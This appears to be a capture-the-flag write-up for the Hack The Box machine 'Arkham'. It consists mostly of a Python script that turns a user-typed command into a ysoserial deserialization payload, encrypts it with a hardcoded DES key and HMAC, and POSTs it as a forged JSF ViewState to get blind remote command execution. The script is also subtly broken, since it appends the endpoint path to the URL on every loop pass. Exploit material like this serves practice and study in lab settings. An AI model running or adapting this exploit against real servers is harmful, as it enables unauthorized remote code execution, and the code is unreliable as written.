[HTB] Arkham

Exploitation script (hardcoded) - Blind CMD

Below you can find python script which after providing IP of the Arkham Box gives you the blind shell.

import os
import base64
from urllib.parse import unquote, quote
import pyDes
import base64
from Crypto.Hash import SHA, HMAC
import requests
import time

# Variables to set
url = "http://10.129.16.165:8080"
encryption_key = bytes(base64.b64decode("SnNGOTg3Ni0="))
exit = False

print("Type 'exit' to quit the program.")
while not exit:
    # Take input and prepare the command
    cmd_input = input("shell (blind) >> ")
    if (cmd_input == "exit"):
        break
        
    command = "java -jar ysoserial-modified.jar CommonsCollections5 cmd '{}' > payload.file".format(cmd_input)

    # Generate the payload using ysoserial
    os.system(command)
    
    # Encrypt
    mac_length = 20
    with open("payload.file", "rb") as f:
        payload = f.read()
    
    encryption_algorithm = pyDes.des(encryption_key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    encrypted_payload = encryption_algorithm.encrypt(payload)
    hmac = HMAC.new(encryption_key, encrypted_payload, SHA).digest()
    encrypted_viewState = encrypted_payload + hmac
    encrypted_viewState = base64.b64encode(encrypted_viewState)

    # Adding endpoint to which we will send malicious ViewState
    url += "/userSubscribe.faces"
    
    data = {
        "j_id_jsp_1623871077_1%3Aemail": "defa@a.pl",
        "j_id_jsp_1623871077_1%3Asubmit": "SIGN+UP",
        "j_id_jsp_1623871077_1_SUBMIT": 1,
        "javax.faces.ViewState": encrypted_viewState
    }
    
    print(payload)
    
    print(command)
    
    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

    
    # Sending the request
    try:
    	request = requests.post(url, data, verify=False, proxies=proxies)
    	print(request.status_code)
    except:
    	pass